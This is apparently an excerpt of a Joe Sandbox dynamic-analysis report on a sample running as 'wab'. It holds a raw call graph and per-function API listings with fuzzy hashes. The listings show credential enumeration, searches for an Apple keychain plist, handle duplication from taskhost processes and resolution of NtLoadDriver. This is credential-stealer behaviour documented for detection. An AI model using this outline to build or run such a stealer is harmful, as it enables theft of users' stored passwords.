39104->39096 39104->39098 39104->39099 39104->39103 39105 40dd50 _wcsicmp 39104->39105 39108 40742e 8 API calls 39104->39108 39109 40e3e0 memcpy 39104->39109 39110 40e3b3 wcschr 39104->39110 39111 40e3fb memcpy 39104->39111 39112 40e416 memcpy 39104->39112 39113 40e431 memcpy 39104->39113 39106 40e376 memset 39105->39106 39107 40aa29 6 API calls 39106->39107 39107->39104 39108->39104 39109->39104 39110->39104 39111->39104 39112->39104 39113->39104 39114->39029 39117 40a980 39115->39117 39116 40a8bb 39116->38954 39116->38955 39117->39116 39118 40a995 _wcsicmp 39117->39118 39119 40a99c wcscmp 39117->39119 39118->39117 39119->39117 39120->38958 39121->38962 39123 40aa23 RegEnumValueW 39122->39123 39123->38969 39123->38970 39125 405335 39124->39125 39126 40522a 39124->39126 39125->38549 39127 40b2cc 27 API calls 39126->39127 39128 405234 39127->39128 39129 40a804 8 API calls 39128->39129 39130 40523a 39129->39130 39169 40b273 39130->39169 39132 405248 _mbscpy _mbscat GetProcAddress 39133 40b273 27 API calls 39132->39133 39134 405279 39133->39134 39172 405211 GetProcAddress 39134->39172 39136 405282 39137 40b273 27 API calls 39136->39137 39138 40528f 39137->39138 39173 405211 GetProcAddress 39138->39173 39140 405298 39141 40b273 27 API calls 39140->39141 39142 4052a5 39141->39142 39174 405211 GetProcAddress 39142->39174 39144 4052ae 39145 40b273 27 API calls 39144->39145 39146 4052bb 39145->39146 39175 405211 GetProcAddress 39146->39175 39148 4052c4 39149 40b273 27 API calls 39148->39149 39150 4052d1 39149->39150 39176 405211 GetProcAddress 39150->39176 39152 4052da 39153 40b273 27 API calls 39152->39153 39154 4052e7 39153->39154 39177 405211 GetProcAddress 39154->39177 39156 4052f0 39157 40b273 27 API calls 39156->39157 39158 4052fd 39157->39158 39178 405211 GetProcAddress 39158->39178 39160 405306 39161 40b273 27 API calls 39160->39161 39162 405313 39161->39162 39179 405211 GetProcAddress 39162->39179 39164 40531c 39165 40b273 27 API calls 39164->39165 39166 405329 
39165->39166 39170 40b58d 27 API calls 39169->39170 39171 40b18c 39170->39171 39171->39132 39172->39136 39173->39140 39174->39144 39175->39148 39176->39152 39177->39156 39178->39160 39179->39164 39182 405220 39 API calls 39181->39182 39183 405369 39182->39183 39183->38987 39183->38988 39184->38990 39185->38994 39186->38991 39187->38988 39189 40440c FreeLibrary 39188->39189 39190 40436d 39189->39190 39191 40a804 8 API calls 39190->39191 39192 404377 39191->39192 39193 404383 39192->39193 39194 404405 39192->39194 39195 40b273 27 API calls 39193->39195 39194->38561 39194->38563 39194->38564 39196 40438d GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043a7 GetProcAddress 39197->39198 39199 40b273 27 API calls 39198->39199 39200 4043ba GetProcAddress 39199->39200 39201 40b273 27 API calls 39200->39201 39202 4043ce GetProcAddress 39201->39202 39203 40b273 27 API calls 39202->39203 39204 4043e2 GetProcAddress 39203->39204 39205 4043f1 39204->39205 39206 4043f7 39205->39206 39207 40440c FreeLibrary 39205->39207 39206->39194 39207->39194 39209 404413 FreeLibrary 39208->39209 39210 40441e 39208->39210 39209->39210 39210->38578 39211->38569 39213 40442e 39212->39213 39214 40447e 39212->39214 39215 40b2cc 27 API calls 39213->39215 39214->38569 39216 404438 39215->39216 39217 40a804 8 API calls 39216->39217 39218 40443e 39217->39218 39219 404445 39218->39219 39220 404467 39218->39220 39221 40b273 27 API calls 39219->39221 39220->39214 39222 404475 FreeLibrary 39220->39222 39223 40444f GetProcAddress 39221->39223 39222->39214 39223->39220 39224 404460 39223->39224 39224->39220 39226 4135f6 39225->39226 39227 4135eb FreeLibrary 39225->39227 39226->38581 39227->39226 39229 4449c4 39228->39229 39230 444a52 39228->39230 39231 40b2cc 27 API calls 39229->39231 39230->38598 39230->38599 39232 4449cb 39231->39232 39233 40a804 8 API calls 39232->39233 39234 4449d1 39233->39234 39235 40b273 27 API calls 39234->39235 39236 4449dc GetProcAddress 39235->39236 
39237 40b273 27 API calls 39236->39237 39238 4449f3 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a04 GetProcAddress 39239->39240 39241 40b273 27 API calls 39240->39241 39242 444a15 GetProcAddress 39241->39242 39243 40b273 27 API calls 39242->39243 39244 444a26 GetProcAddress 39243->39244 39245 40b273 27 API calls 39244->39245 39249->38609 39250->38609 39251->38609 39252->38609 39253->38600 39255 403a29 39254->39255 39269 403bed memset memset 39255->39269 39257 403ae7 39282 40b1ab ??3@YAXPAX ??3@YAXPAX 39257->39282 39258 403a3f memset 39264 403a2f 39258->39264 39260 403aef 39260->38617 39261 409b98 GetFileAttributesW 39261->39264 39262 40a8d0 7 API calls 39262->39264 39263 409d1f 6 API calls 39263->39264 39264->39257 39264->39258 39264->39261 39264->39262 39264->39263 39266 40a051 GetFileTime FindCloseChangeNotification 39265->39266 39267 4039ca CompareFileTime 39265->39267 39266->39267 39267->38617 39268->38616 39270 414c2e 16 API calls 39269->39270 39271 403c38 39270->39271 39272 409719 2 API calls 39271->39272 39273 403c3f wcscat 39272->39273 39274 414c2e 16 API calls 39273->39274 39275 403c61 39274->39275 39276 409719 2 API calls 39275->39276 39277 403c68 wcscat 39276->39277 39283 403af5 39277->39283 39280 403af5 20 API calls 39281 403c95 39280->39281 39281->39264 39282->39260 39284 403b02 39283->39284 39285 40ae18 9 API calls 39284->39285 39293 403b37 39285->39293 39286 403bdb 39288 40aebe FindClose 39286->39288 39287 40add4 wcscmp wcscmp 39287->39293 39289 403be6 39288->39289 39289->39280 39290 40ae18 9 API calls 39290->39293 39291 40ae51 9 API calls 39291->39293 39292 40aebe FindClose 39292->39293 39293->39286 39293->39287 39293->39290 39293->39291 39293->39292 39294 40a8d0 7 API calls 39293->39294 39294->39293 39296 409d1f 6 API calls 39295->39296 39297 404190 39296->39297 39310 409b98 GetFileAttributesW 39297->39310 39299 40419c 39300 4041a7 6 API calls 39299->39300 39301 40435c 39299->39301 39303 40424f 39300->39303 
39301->38643 39303->39301 39304 40425e memset 39303->39304 39306 409d1f 6 API calls 39303->39306 39307 40a8ab 9 API calls 39303->39307 39311 414842 39303->39311 39304->39303 39305 404296 wcscpy 39304->39305 39305->39303 39306->39303 39308 4042b6 memset memset _snwprintf wcscpy 39307->39308 39308->39303 39309->38641 39310->39299 39314 41443e 39311->39314 39313 414866 39313->39303 39315 41444b 39314->39315 39316 414451 39315->39316 39317 4144a3 GetPrivateProfileStringW 39315->39317 39318 414491 39316->39318 39319 414455 wcschr 39316->39319 39317->39313 39321 414495 WritePrivateProfileStringW 39318->39321 39319->39318 39320 414463 _snwprintf 39319->39320 39320->39321 39321->39313 39322->38647 39324 40b2cc 27 API calls 39323->39324 39325 409615 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 409625 39326->39327 39352 409b98 GetFileAttributesW 39327->39352 39329 409634 39330 409648 39329->39330 39353 4091b8 memset 39329->39353 39332 40b2cc 27 API calls 39330->39332 39334 408801 39330->39334 39333 40965d 39332->39333 39335 409d1f 6 API calls 39333->39335 39334->38650 39334->38651 39336 40966d 39335->39336 39405 409b98 GetFileAttributesW 39336->39405 39338 40967c 39338->39334 39339 409681 39338->39339 39406 409529 72 API calls 39339->39406 39341 409690 39341->39334 39352->39329 39407 40a6e6 WideCharToMultiByte 39353->39407 39355 409202 39408 444432 39355->39408 39358 40b273 27 API calls 39359 409236 39358->39359 39454 438552 39359->39454 39362 409383 39364 40b273 27 API calls 39362->39364 39366 409399 39364->39366 39368 438552 134 API calls 39366->39368 39386 4093a3 39368->39386 39372 4094ff 39375 4251c4 137 API calls 39375->39386 39379 4093df 39383 4253cf 17 API calls 39383->39386 39385 40951d 39385->39330 39386->39372 39386->39375 39386->39379 39386->39383 39388 4093e4 39386->39388 39405->39338 39406->39341 39407->39355 39504 4438b5 39408->39504 39410 44444c 39416 409215 39410->39416 39518 415a6d 39410->39518 39412 4442e6 11 API calls 39414 44469e 39412->39414 
39413 444486 39415 4444b9 memcpy 39413->39415 39453 4444a4 39413->39453 39414->39416 39418 443d90 111 API calls 39414->39418 39522 415258 39415->39522 39416->39358 39416->39385 39418->39416 39419 444524 39420 444541 39419->39420 39421 44452a 39419->39421 39525 444316 39420->39525 39422 416935 16 API calls 39421->39422 39422->39453 39425 444316 18 API calls 39426 444563 39425->39426 39453->39412 39592 438460 39454->39592 39456 409240 39456->39362 39457 4251c4 39456->39457 39604 424f07 39457->39604 39459 4251e4 39505 4438d0 39504->39505 39515 4438c9 39504->39515 39506 415378 memcpy memcpy 39505->39506 39507 4438d5 39506->39507 39508 4154e2 10 API calls 39507->39508 39509 443906 39507->39509 39507->39515 39508->39509 39510 443970 memset 39509->39510 39509->39515 39513 44398b 39510->39513 39511 4439a0 39512 415700 10 API calls 39511->39512 39511->39515 39516 4439c0 39512->39516 39513->39511 39514 41975c 10 API calls 39513->39514 39514->39511 39515->39410 39516->39515 39517 418981 10 API calls 39516->39517 39517->39515 39519 415a77 39518->39519 39520 415a8d 39519->39520 39521 415a7e memset 39519->39521 39520->39413 39521->39520 39523 4438b5 11 API calls 39522->39523 39524 41525d 39523->39524 39524->39419 39526 444328 39525->39526 39527 444423 39526->39527 39528 44434e 39526->39528 39529 4446ea 11 API calls 39527->39529 39530 432d4e memset memset memcpy 39528->39530 39536 444381 39529->39536 39531 44435a 39530->39531 39533 444375 39531->39533 39538 44438b 39531->39538 39532 432d4e memset memset memcpy 39536->39425 39538->39532 39593 41703f 11 API calls 39592->39593 39594 43847a 39593->39594 39595 43848a 39594->39595 39596 43847e 39594->39596 39598 438270 134 API calls 39595->39598 39597 4446ea 11 API calls 39596->39597 39600 438488 39597->39600 39599 4384aa 39598->39599 39599->39600 39601 424f26 123 API calls 39599->39601 39600->39456 39602 4384bb 39601->39602 39603 438270 134 API calls 39602->39603 39603->39600 39605 424f1f 39604->39605 39606 424f0c 39604->39606 39608 
424eea 11 API calls 39605->39608 39607 416760 11 API calls 39606->39607 39609 424f18 39607->39609 39610 424f24 39608->39610 39609->39459 39610->39459 39661 413f4f 39634->39661 39637 413f37 K32GetModuleFileNameExW 39638 413f4a 39637->39638 39638->38710 39640 413969 wcscpy 39639->39640 39641 41396c wcschr 39639->39641 39653 413a3a 39640->39653 39641->39640 39643 41398e 39641->39643 39666 4097f7 wcslen wcslen _memicmp 39643->39666 39645 41399a 39646 4139a4 memset 39645->39646 39647 4139e6 39645->39647 39667 409dd5 GetWindowsDirectoryW wcscpy 39646->39667 39649 413a31 wcscpy 39647->39649 39650 4139ec memset 39647->39650 39649->39653 39668 409dd5 GetWindowsDirectoryW wcscpy 39650->39668 39651 4139c9 wcscpy wcscat 39651->39653 39653->38710 39654 413a11 memcpy wcscat 39654->39653 39656 413cb0 GetModuleHandleW 39655->39656 39657 413cda 39655->39657 39656->39657 39658 413cbf GetProcAddress 39656->39658 39659 413ce3 GetProcessTimes 39657->39659 39660 413cf6 39657->39660 39658->39657 39659->38712 39660->38712 39662 413f2f 39661->39662 39663 413f54 39661->39663 39662->39637 39662->39638 39664 40a804 8 API calls 39663->39664 39665 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39664->39665 39665->39662 39666->39645 39667->39651 39668->39654 39669->38732 39670->38756 39672 409cf9 GetVersionExW 39671->39672 39673 409d0a 39671->39673 39672->39673 39673->38762 39673->38766 39674->38768 39675->38771 39676->38773 39677->38838 39679 40bba5 39678->39679 39726 40cc26 39679->39726 39682 40bd4b 39747 40cc0c 39682->39747 39687 40b2cc 27 API calls 39688 40bbef 39687->39688 39754 40ccf0 _wcsicmp 39688->39754 39690 40bbf5 39690->39682 39755 40ccb4 6 API calls 39690->39755 39692 40bc26 39693 40cf04 17 API calls 39692->39693 39694 40bc2e 39693->39694 39695 40bd43 39694->39695 39696 40b2cc 27 API calls 39694->39696 39697 40cc0c 4 API calls 39695->39697 39698 40bc40 39696->39698 39697->39682 39756 40ccf0 _wcsicmp 39698->39756 39700 40bc46 39700->39695 39701 
40bc61 memset memset WideCharToMultiByte 39700->39701 39757 40103c strlen 39701->39757 39703 40bcc0 39704 40b273 27 API calls 39703->39704 39705 40bcd0 memcmp 39704->39705 39705->39695 39706 40bce2 39705->39706 39707 404423 37 API calls 39706->39707 39708 40bd10 39707->39708 39708->39695 39709 40bd3a LocalFree 39708->39709 39710 40bd1f memcpy 39708->39710 39709->39695 39710->39709 39711->38853 39713 409a74 GetTempFileNameW 39712->39713 39714 409a66 GetWindowsDirectoryW 39712->39714 39713->38852 39714->39713 39715->38890 39716->38890 39717->38890 39718->38890 39719->38890 39720->38890 39721->38890 39722->38890 39723->38890 39724->38865 39725->38887 39758 4096c3 CreateFileW 39726->39758 39728 40cc34 39729 40cc3d GetFileSize 39728->39729 39737 40bbca 39728->39737 39730 40afcf 2 API calls 39729->39730 39731 40cc64 39730->39731 39759 40a2ef ReadFile 39731->39759 39733 40cc71 39760 40ab4a MultiByteToWideChar 39733->39760 39735 40cc95 FindCloseChangeNotification 39736 40b04b ??3@YAXPAX 39735->39736 39736->39737 39737->39682 39738 40cf04 39737->39738 39739 40b633 ??3@YAXPAX 39738->39739 39740 40cf14 39739->39740 39766 40b1ab ??3@YAXPAX ??3@YAXPAX 39740->39766 39742 40bbdd 39742->39682 39742->39687 39743 40cf1b 39743->39742 39745 40cfef 39743->39745 39767 40cd4b 39743->39767 39746 40cd4b 14 API calls 39745->39746 39746->39742 39748 40b633 ??3@YAXPAX 39747->39748 39749 40cc15 39748->39749 39750 40aa04 ??3@YAXPAX 39749->39750 39751 40cc1d 39750->39751 39816 40b1ab ??3@YAXPAX ??3@YAXPAX 39751->39816 39753 40b7d4 memset CreateFileW 39753->38845 39753->38846 39754->39690 39755->39692 39756->39700 39757->39703 39758->39728 39759->39733 39761 40ab6b 39760->39761 39765 40ab93 39760->39765 39762 40a9ce 4 API calls 39761->39762 39763 40ab74 39762->39763 39764 40ab7c MultiByteToWideChar 39763->39764 39764->39765 39765->39735 39766->39743 39768 40cd7b 39767->39768 39801 40aa29 39768->39801 39770 40cef5 39771 40aa04 ??3@YAXPAX 39770->39771 39772 40cefd 39771->39772 39772->39743 39774 

                                                Control-flow Graph (starting at block 40dd85-40ddeb; graph not reproduced)
                                                APIs
                                                • memset.MSVCRT ref: 0040DDAD
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                • memset.MSVCRT ref: 0040DF5F
                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                • API String ID: 594330280-3398334509
                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph (starting at block 413d4c-413da0; graph not reproduced)
                                                APIs
                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                • memset.MSVCRT ref: 00413D7F
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                • memset.MSVCRT ref: 00413E07
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                • API String ID: 912665193-1740548384
                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                • memcpy.MSVCRT ref: 0040B60D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                • String ID: BIN
                                                • API String ID: 1668488027-1015027815
                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                • String ID:
                                                • API String ID: 2947809556-0
                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileFind$FirstNext
                                                • String ID:
                                                • API String ID: 1690352074-0
                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0041898C
                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: InfoSystemmemset
                                                • String ID:
                                                • API String ID: 3558857096-0
                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 004455C2
                                                • wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 0044570D
                                                • memset.MSVCRT ref: 00445725
                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                • memset.MSVCRT ref: 0044573D
                                                • memset.MSVCRT ref: 00445755
                                                • memset.MSVCRT ref: 004458CB
                                                • memset.MSVCRT ref: 004458E3
                                                • memset.MSVCRT ref: 0044596E
                                                • memset.MSVCRT ref: 00445A10
                                                • memset.MSVCRT ref: 00445A28
                                                • memset.MSVCRT ref: 00445AC6
                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                • memset.MSVCRT ref: 00445B52
                                                • memset.MSVCRT ref: 00445B6A
                                                • memset.MSVCRT ref: 00445C9B
                                                • memset.MSVCRT ref: 00445CB3
                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                • memset.MSVCRT ref: 00445B82
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                • memset.MSVCRT ref: 00445986
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                • API String ID: 2745753283-3798722523
                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
